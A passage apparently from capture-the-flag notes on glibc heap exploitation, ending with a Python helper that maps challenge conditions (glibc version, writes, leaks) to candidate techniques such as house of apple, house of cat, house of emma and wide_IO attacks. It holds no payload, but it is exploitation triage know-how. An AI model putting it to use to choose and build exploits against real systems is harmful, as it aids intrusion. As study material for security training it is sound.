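Here a fake IO structure is clearly required, using an existing chain such as apple, cat, 魑魅魍魉, or 琴瑟琵琶.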
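
The eight cases above can be condensed into a small lookup, which is handy as a checklist when triaging a challenge. This is only a sketch encoding the classification from these notes: suggest_attack and its parameter names are hypothetical, the returned labels are the technique names used above, and the glibc version is passed as a tuple so that 2.4 and 2.34 are not confused.

```python
def suggest_attack(glibc, many_writes, arbitrary_data, second_leak):
    """Map a challenge profile to the candidate techniques listed in the summary.

    glibc          -- version tuple, e.g. (2, 35)
    many_writes    -- True if memory can be written two or more times
    arbitrary_data -- True if any data can be written, False if only heap values
    second_leak    -- True if memory can be leaked a second time
    Returns a list of technique names, or None for the infeasible cases 5 and 7.
    """
    if not arbitrary_data:
        if second_leak:
            return None                              # cases 5 and 7
        if many_writes:
            return ["house_of_emma", "wide_IO"]      # case 6
        return ["apple", "cat", "魑魅魍魉", "琴瑟琵琶"]  # case 8
    if glibc < (2, 34):
        return ["hook"]                              # cases 1-4 before 2.34
    if many_writes or second_leak:
        return ["EOP", "wide_IO"]                    # cases 1, 2, 3
    return ["vtable", "EOP", "wide_IO"]              # case 4


if __name__ == "__main__":
    print(suggest_attack((2, 35), many_writes=False, arbitrary_data=False, second_leak=False))
```

The function deliberately returns candidates rather than a single answer, since the notes list several viable chains for most cases.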